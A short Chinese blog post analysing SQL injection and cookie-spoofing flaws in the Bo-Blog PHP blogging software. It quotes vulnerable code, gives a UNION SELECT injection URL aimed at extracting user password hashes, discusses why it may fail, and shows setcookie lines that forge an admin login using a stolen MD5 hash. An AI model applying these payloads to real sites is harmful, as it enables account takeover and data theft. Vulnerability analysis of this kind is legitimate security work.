Bo-Blog BloggerBo-blog 博客程序注入后 COOKIE 欺骗漏洞
看了 xhming 同学的文章有感而发,立马重新下载 boblog 看一篇,那个注入漏洞形成 xhming 同学已经说明了,此前我找到一个注入漏洞,也和这个差不多,可惜……
经典对白,看代码。
index.php: if ($go) @list($job, $itemid)=@explode('_', basename($go)); |
原本注入语句为:index.php?go=category_0) union select 1,concat(userpsw) from boblog_user%23
也就是,经过 explode 处理后,假如数据库为 boblog_user,最终只会成为 boblog。
更何况,存在注入漏洞的:`category` in ({$all_needed_cates})");
不会因为 # 符号而注释掉后面的东西,只会变成 from boblog_user#)。PS:可能因为这里我不会绕过。
COOKIES 欺骗漏洞很简单,假如某牛真的注入成功得到 MD5 密码不用去跑 MD5 了,直接:
setcookie ('userid', '1',);
setcookie ('userpsw', 'md5密文', );
既可了……